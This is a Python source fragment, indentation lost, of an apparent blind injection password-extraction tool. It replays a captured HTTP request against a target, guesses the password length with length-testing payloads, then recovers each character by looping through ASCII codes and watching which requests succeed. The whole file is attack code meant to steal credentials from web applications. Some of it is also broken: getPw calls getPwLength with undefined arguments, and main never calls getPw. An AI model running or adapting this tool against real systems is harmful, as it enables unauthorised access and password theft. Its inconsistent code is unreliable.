def getPwLength(connection):
pwLength = -1
n = 0
for n in range(1, 31):
payload = buildPayloadForLength(n)
if not requestFailed(payload, connection):
chitter.info(" payload: {}".format(payload))
pwLength = n
break
print("[+++] password length = {} characters wide.".format(pwLength))
return pwLength
def main():
chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
chitter.post("")
chitter.post("{}".format(__banner__))
chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
chitter.info(__description__)
chitter.debug("TEST TEST TEST")
# argument parser
parser = argparse.ArgumentParser()
args = initParser(parser)
chitter.status("parse input parameters")
# initialization / read in file with headerfield definitions
chitter.status("read parameters from requestheader file '{}'".format(
__gHeaderfieldsFile__))
init()
__gInputParameters__.update(handleArgs(args))
updateHeaders(__gInputParameters__['headerfile'])
# update
for k in __gRequestParameters__.keys():
if k != __gXparam__ and not k in __gExclude__:
__gInclude__.update({k: __gRequestParameters__[k]})
try:
for x in __gExclude__:
del __gInclude__[x]
except:
pass
__connection__ = connectTarget()
if __connection__ != None:
if __gTestHeader__:
testConnection(__connection__)
else:
getPwLength(__connection__)
else:
chitter.fatal("Connection could not be established!")
exit(0)
# dont forget to close __connection__
__connection__.close()
def getPw(connection):
pw = ""
c = 32
pwLength = getPwLength(header, inputParameters, requestParameters)
if pwLength > -1:
for n in range(1, pwLength + 1):
c = 32
for c in range(32, 128):
payload = buildPayloadForName(chr(c), n)
if not requestFailed(payload, connection):
chitter.info(" payload: {}".format(payload))
pw += chr(c)
chitter.info(" pw={}".format(pw))
break
else:
print(
"[-] Password retrievel failed. Password length could not be determined!"
)
print("[+++ FOUND +++] password = {}".format(pw))
def updateHeaders(__headerFile__):
#method=""
try:
with open(__headerFile__, 'r') as hf:
chitter.info(" -----------------------------------------")
chitter.info(" header request fields from header file:")
for line in hf.readlines():
sline = line.strip("\n")
fieldFound = False
for k, v in __gHeaderFields__.items():
# only proceed if match is not followed by a '-' to avoid mixup e.g. for Accept vs. Accept-Encoding
if sline.find(k) > -1 and sline[len(k)] != '-':
v = sline[(sline.find(k) + len(k)):(len(sline) + 1)]
v = re.sub(r'^[:| #]*', '',
v) #remove ':',' ','|' from the beginning
__gHeader__.update({k: v})
chitter.info("\t {}: {}".format(k, v))
if (k == 'Cookie'):
updateCookies(v)
fieldFound = True
if (k == 'Host'):
__gInputParameters__.update({'target': v})
break
if (not fieldFound):
if sline != "":
if sline.find("GET") > -1 or sline.find("POST") > -1:
readRequestHeader(line)
else:
if (__gInputParameters__['method'] == "POST"):
#sline=line.strip("\n")
chitter.info(
"\t-----------------------------------------"
)
chitter.info(
"\tPOST request parameters from header file:"
)
updateRequestParameters(sline, "POST")
except Exception as e:
print("[!!!] Error in updateHeaders()!")
print(e)
def readRequestHeader(line):
(method, loc, h) = line.split(" ")
h = h.strip('\n')
chitter.info("\t[REQUEST] {} {} {}".format(method, loc, h))
if (method != "POST" and method != "GET"):
method = ""
loc = ""
h = ""
elif (method == "GET"):
if loc.find("?") > -1:
loc = re.sub(r'[\n ]*', '', loc)
(path, p) = loc.split("?")
updateRequestParameters(p, "GET")
else:
path = loc #assuming path without request parameters
chitter.warn(
"Did not find any RequestParameters in provided Header")
elif (method == "POST"):
path = loc
__gInputParameters__.update({'method': method, 'path': path})
def testConnection(connection):
requestParameters = urllib.parse.urlencode(__gRequestParameters__)
connection.request(__gInputParameters__['method'],
__gInputParameters__['path'], requestParameters,
__gHeader__)
resp = connection.getresponse()
chitter.status("[CONNECTION] {} - {}".format(resp.status, resp.reason))
data = resp.read(100)
try:
data_out = gzip.decompress(data)
except:
data_out = data
pass
chitter.info(str(resp.status) + " | " + str(resp.reason))
chitter.info("RESPONSE HEADERS")
for key in resp.headers:
chitter.info("\t" + key + " : " + resp.headers[key])
chitter.info("BODY:\n\t")
chitter.info("--------- BODY BEGIN ---------")
chitter.info(data_out)
chitter.info("--------- BODY END ---------")